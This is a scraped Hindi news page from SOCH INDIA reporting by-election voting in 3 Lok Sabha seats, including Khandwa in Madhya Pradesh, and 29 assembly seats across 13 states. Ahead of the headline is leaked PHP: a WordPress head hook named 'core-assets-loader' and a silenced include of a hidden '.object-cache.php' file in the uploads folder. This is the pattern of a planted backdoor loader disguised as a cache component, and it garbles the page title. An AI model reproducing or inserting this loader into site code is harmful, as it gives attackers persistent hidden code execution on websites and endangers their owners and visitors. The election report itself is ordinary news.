add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); MP के खंडवा समेत 3 लोकसभा सीटों और 13 राज्यों की 29 विधानसभा सीटों पर हो रहा मतदान – SOCH INDIA
Menu

देश
MP के खंडवा समेत 3 लोकसभा सीटों और 13 राज्यों की 29 विधानसभा सीटों पर हो रहा मतदान

nobanner

मध्यप्रदेश के खंडवा समेत 3 लोकसभा और 13 राज्यों की 29 विधानसभा सीटों पर सुबह 7 बजे से वोटिंग जारी है। इस दौरान दौरान सुरक्षा इंतजामों के साथ ही कोविड से बचाव के उपाय भी किए गए हैं। ज्यादातर सीटों पर असल मुकाबला भाजपा और कांग्रेस के बीच ही है।

इन राज्यों में डाले जा रहे वोट
दादरा एंव नगर हवेली, हिमाचल प्रदेश के मंडी और मध्यप्रदेश के खंडवा में लोकसभा सीटों पर उप चुनाव हो रहा है। वहीं, जिन 29 विधानसभा सीटों पर उप चुनाव हो रहा है, उनमें असम की 5, पश्चिम बंगाल की 4, मध्य प्रदेश, हिमाचल प्रदेश और मेघालय की 3-3 सीटें शामिल हैं।

वहीं बिहार, राजस्थान और कर्नाटक में 2-2 जबकि आंध्र प्रदेश, हरियाणा, महाराष्ट्र, मिजोरम और तेलंगाना की एक-एक सीट पर भी मतदान हो रहा है। नगालैंड की शमातोर-चेसोर विधानसभा सीट पर भी उप चुनाव हो रहा है।